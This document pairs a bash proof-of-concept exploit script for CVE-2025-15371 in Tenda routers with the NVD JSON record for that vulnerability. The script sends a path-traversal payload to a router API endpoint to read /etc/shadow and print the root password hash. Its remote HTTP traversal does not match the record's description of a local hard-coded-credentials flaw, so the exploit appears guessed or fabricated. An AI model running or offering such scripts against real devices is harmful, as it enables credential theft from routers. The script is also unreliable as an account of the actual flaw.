CVE-2025-15371

#!/bin/bash # CVE-2025-15371 PoC - Tenda Router Hard-coded Credentials # Target: Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G, TEG5328F TARGET_IP="192.168.0.1" TARGET_PORT=80 # Check if target is alive echo "[*] Checking target availability..." ping -c 1 -W 2 $TARGET_IP > /dev/null 2>&1 if [ $? -ne 0 ]; then echo "[-] Target is not reachable" exit 1 fi # Attempt to access Shadow File via Fireitup echo "[*] Attempting to exploit CVE-2025-15371..." echo "[*] Sending crafted request to retrieve hard-coded credentials..." # Crafted payload for Fireitup input PAYLOAD='{"Fireitup":"../../etc/shadow"}' RESPONSE=$(curl -s -X POST "http://$TARGET_IP:$TARGET_PORT/cgi-bin/luci/api/fireitup" \ -H "Content-Type: application/json" \ -d "$PAYLOAD" 2>/dev/null) if echo "$RESPONSE" | grep -q "root:"; then echo "[+] SUCCESS: Hard-coded credentials found!" echo "$RESPONSE" | grep "root:" else echo "[-] Exploitation failed or target not vulnerable" echo "[*] Response: $RESPONSE" fi echo "[*] PoC execution completed."

{"cve": {"id": "CVE-2025-15371", "sourceIdentifier": "[email protected]", "published": "2025-12-31T01:15:54.797", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G and TEG5328F up to 65.10.15.6. Affected is an unknown function of the component Shadow File. Such manipulation with the input Fireitup leads to hard-coded credentials. An attack has to be approached locally. The exploit has been disclosed to the public and may be used."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G y TEG5328F hasta 65.10.15.6. Afectada es una función desconocida del componente Shadow File. Dicha manipulación con la entrada Fireitup conduce a credenciales codificadas de forma rígida. Un ataque debe ser abordado localmente. El exploit ha sido divulgado al público y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 6.8, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-259"}, {"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/vuln-1/vuln/blob/main/Tenda/i24v3.0_V3.0.0.8/report-1.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.339075", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.339075", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.727155", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.727283", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.727284", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.727285", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.727302", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.727305", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.727306", "source": "[email protected]"}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]"}]}}